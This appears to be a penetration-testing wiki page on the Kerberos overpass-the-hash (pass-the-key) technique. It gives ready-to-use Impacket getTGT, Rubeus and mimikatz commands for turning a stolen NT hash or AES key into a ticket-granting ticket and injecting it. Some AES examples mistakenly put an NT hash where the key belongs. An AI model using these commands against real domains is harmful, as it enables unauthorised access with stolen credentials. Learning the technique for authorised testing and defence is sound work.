Overpass the hash

Theory

In short, an attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) or indirectly over Kerberos (overpass-the-hash, also known as pass-the-key).

With overpass-the-hash, an attacker can leverage a user's NT hash to request a TGT, that can then be used with pass-the-ticket to request a Service ticket and access a service using Kerberos. This is possible only when RC4 etype is enable for Kerberos, which is the case by default.

When RC4 etype is not enabled, they other keys (DES, AES) can be passed in the same way, hence the alias for this technique "pass the key".

Practice

The Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a ccache file that can then be used by other Impacket scripts.

# with a password
getTGT.py $DOMAIN/$USER:$PASSWORD@$TARGET
​
# with an NT hash
getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET
​
# with an AES (128 or 256 bits) key
getTGT.py -aesKey 'LMhash:NThash' $DOMAIN/$USER@$TARGET

Once a TGT is obtained, the tester can use it with the environment variable KRB5CCNAME with tools implementing pass-the-ticket.

On Windows, requesting a TGT can be achieved with Rubeus (C#). The ticket will be injected in the session and Windows will natively be able to use these tickets to access given services.

# with an NT hash
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /rc4:$NThash /ptt
​
# with an AES 128 key
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes128:$NThash /ptt
​
# with an AES 256 key
Rubeus.exe asktgt /domain:$DOMAIN /user:$USER /aes256:$NThash /ptt

An alternative to Rubeus is mimikatz.

# with an NT hash
sekurlsa::pth /user:$USER /domain:$DOMAIN /rc4:$NThash /ptt
​
# with an AES 128 key
sekurlsa::pth /user:$USER /domain:$DOMAIN /aes128:$aes128_key /ptt
​
# with an AES 256 key
sekurlsa::pth /user:$USER /domain:$DOMAIN /aes256:$aes256_key /ptt

For both mimikatz and Rubeus, the /ptt flag is used to automatically inject the ticket.

Resources